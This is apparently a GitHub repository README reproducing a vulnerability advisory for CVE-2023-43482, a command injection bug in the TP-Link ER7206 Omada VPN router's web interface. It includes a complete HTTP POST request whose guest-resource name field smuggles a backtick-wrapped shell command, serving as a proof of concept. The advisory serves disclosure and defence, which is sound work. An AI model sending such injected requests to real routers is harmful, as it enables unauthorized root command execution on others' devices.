Skip to content
/ CVE-2023-43482 Public

TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Command injection Vulnerability

4 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Mr-xn/CVE-2023-43482

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits

README.md

README.md

 
 

Repository files navigation

CVE-2023-43482

TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Command injection Vulnerability

SUMMARY

A command execution vulnerability exists in the guest resource functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591

PRODUCT URLS

ER7206 Omada Gigabit VPN Router - https://www.tp-link.com/us/business-networking/vpn-router/er7206/

DETAILS

The ER7206 Omada Gigabit VPN Router is a high-performance networking solution that supports gigabit connectivity, highly secure VPN and integration with Omada SDN for centralized cloud management and zero-touch provisioning.

The ER7206 Omada Gigabit VPN Router runs various services to manage the router or devices connected to the router. One such service is uhttpd which runs on port 80/443. It gives users a web interface to configure and manage the router. By default, the service runs as a root user. An attacker can gain root access to the device by exploiting this service.

A command injection vulnerability exists in the uhttpd service when a guest resource is added to the device. In the web interface, the guest resource page can be accessed by navigating to Authentication -> Authentication Settings -> Guest Resources. It contains features to add, edit, and delete guest resources. When a guest resource is added, it triggers the following the HTTP Post request:

POST /cgi-bin/luci/;stok=b53d9dc12fe8aa66f4fdc273e6eaa534/admin/freeStrategy?form=strategy_list HTTP/1.1
Host: 192.168.8.100
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: sysauth=8701fa9dc1908978bc804e7d08931706
Content-Length: 470

data=%7B%22method%22%3A%22add%22%2C%22params%22%3A%7B%22index%22%3A0%2C%22old%22%3A%22add%22%2C%22new%22%3A%7B%22name%22%3A%22DDDDL|`/usr/bin/id>/tmp/had`%22%2C%22strategy_type%22%3A%22five_tuple%22%2C%22src_ipset%22%3A%22%2F%22%2C%22dst_ipset%22%3A%22%2F%22%2C%22mac%22%3A%22%22%2C%22sport%22%3A%22-%22%2C%22dport%22%3A%22-%22%2C%22service_type%22%3A%22TCP%22%2C%22zone%22%3A%22LAN1%22%2C%22comment%22%3A%22%22%2C%22enable%22%3A%22on%22%7D%2C%22key%22%3A%22add%22%7D%7D

About

TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Command injection Vulnerability

Resources

Readme
Activity

Stars

4 stars

Watchers

2 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published